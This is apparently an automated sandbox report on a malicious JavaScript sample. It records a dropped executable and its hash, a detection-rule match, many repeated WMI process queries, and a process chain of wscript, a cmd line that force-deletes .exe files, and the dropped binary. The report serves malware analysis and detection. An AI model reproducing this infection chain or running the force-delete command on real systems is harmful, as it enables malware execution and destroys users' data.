Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 62A95C926C8513C9F3ACF65A5B33CBB88174555E2759C1B52DD6629F743A59ED
Source: xPUqa4qbDL.jsInitial sample: Strings found which are bigger than 50
Source: ibfmvoj.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ibfmvoj.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ibfmvoj.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ibfmvoj.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 0000000B.00000003.238666236.0000025BBBBB1000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
Source: classification engineClassification label: mal88.evad.winJS@13/12@3/3
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0B96954 FormatMessageW,GetLastError,WideCharToMultiByte,WideCharToMultiByte,FormatMessageA,MultiByteToWideChar,LocalAlloc,MultiByteToWideChar,SysAllocString,LocalFree,LocalFree,7_2_00007FF7C0B96954
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeCode function: 7_2_00007FF7C0BA2D74 FindResourceExW,LoadResource,FindResourceExW,LoadResource,SetLastError,7_2_00007FF7C0BA2D74
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\nsoerwoelJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: xPUqa4qbDL.jsVirustotal: Detection: 35%
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js'
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\wscript.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' apxje
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\system32\cmd.exe' /c del /F /S /Q 'C:\Users\user\AppData\Local\nsoerwoel\*.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe 'C:\Users\user\AppData\Local\nsoerwoel\ibfmvoj.exe' 'C:\Users\user\Desktop\xPUqa4qbDL.js' vmowiiwl
